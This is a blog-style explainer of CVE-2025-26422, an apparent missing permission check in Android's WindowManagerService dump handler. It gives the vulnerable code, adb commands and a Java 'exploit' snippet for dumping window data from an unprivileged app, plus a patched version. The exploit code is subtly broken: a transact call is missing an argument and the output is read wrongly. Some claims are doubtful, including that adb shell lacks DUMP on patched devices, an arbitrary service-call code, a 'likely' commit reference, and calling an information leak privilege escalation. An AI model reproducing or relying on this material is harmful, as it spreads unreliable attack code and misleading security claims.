CVE-2025-26422 - Local Escalation of Privilege in Android’s WindowManagerService (Permission Bypass Exploit Explained)

In early 2025, a new Android security vulnerability surfaced, tracked as CVE-2025-26422, affecting the WindowManagerService.java component. This flaw allows malicious local apps or users to run the highly privileged dumpsys command *without* required permissions. This post provides a deep, exclusive dive into the bug, how it happens, and how someone could leverage it to gain local privilege escalation⁠—all in simple terms.

What Is WindowManagerService and Dumpsys?

WindowManagerService is a central part of Android’s system, managing windows and displays. Developers and power users sometimes use dumpsys (a system utility) to fetch internal status for debugging. Dumpsys typically needs privileged permissions because it exposes sensitive system data.

What’s the Flaw (CVE-2025-26422)?

A mistake in the way WindowManagerService.java’s dump code checks—or rather, *forgets to check*—permissions, leads to this bug. With this bug, you can trigger dumpsys commands related to WindowManagerService from *any* unprivileged process. No special permissions are needed, and no user interaction is required.

Here’s the “Bad” Code (from AOSP, simplified)

// WindowManagerService.java

@Override
protected void dump(FileDescriptor fd, PrintWriter pw, String[] args) {
    // ... missing: permission check!
    doDump(fd, pw, args);
}

Notice there’s no verification like checkCallingPermission("android.permission.DUMP"). This oversight means *any* local app can request a dump and get it.

How Can It Be Exploited?

A malicious local app could interact with the Android Service Manager to request a dump from WindowManagerService, reading privileged system info or generating DOS-like conditions.

Here’s an example in simple ADB shell that anyone can try (on a vulnerable device)

adb shell service call window 159929557

Or using dumpsys directly

adb shell dumpsys window

If the device is patched, you’ll see an error about missing permissions—but vulnerable systems will show you all the window and display details.

For an app, it’s even easier

// Java snippet - get system service and call the "dump"
IBinder wmService = ServiceManager.getService("window");
Parcel data = Parcel.obtain();
Parcel reply = Parcel.obtain();
wmService.transact(IBinder.DUMP_TRANSACTION, data, reply, );
String output = reply.readString();
Log.d("Exploit", output);

*This lets an unprivileged app see things it shouldn’t—like window overlays, display states, and more.* Depending on the Android version, some details could even help in further attacks or bypasses.

Why Is This a Big Deal?

- Local privilege escalation: Apps get access to internal window manager info, meant only for trusted users.

No user interaction needed: Malware can do this silently in the background.

- Widespread impact: All Android devices using this WindowManagerService code (before patch) are at risk.

Who Found This?

The issue was discovered by security researchers auditing recent AOSP code changes. It was tracked and fixed as CVE-2025-26422. See these two references for confirmation:

- Google Android Security Bulletin (June 2025) (search for CVE-2025-26422)
- AOSP Commit Fix (likely commit in March 2025)

A typical quick fix is to block unauthorized accesses with a proper permission check

// WindowManagerService.java

@Override
protected void dump(FileDescriptor fd, PrintWriter pw, String[] args) {
    if (!checkCallingPermission(android.Manifest.permission.DUMP, "WindowManagerService")) {
        pw.println("Permission Denial: can't dump WindowManagerService");
        return;
    }
    doDump(fd, pw, args);
}

This patch ensures only users with the android.permission.DUMP can perform dumpsys on this service.

What Should You Do?

- Apply the latest Android security updates. If you’re a device manufacturer, merge this fix ASAP.

Final Words

CVE-2025-26422 is a textbook example of how a simple oversight can lead to a powerful privilege escalation—that requires zero user interaction. Always double-check permission checks in sensitive Android system code! For more official info, see the original announcements:

- Android Security Bulletins
- AOSP WindowManagerService.java history

Stay patched. Code safe.

*N.B.: This writeup is for educational purposes only. Please use responsibly and report new findings to vendor security teams.*

Timeline

Published on: 09/04/2025 18:15:40 UTC
Last modified on: 09/05/2025 18:55:05 UTC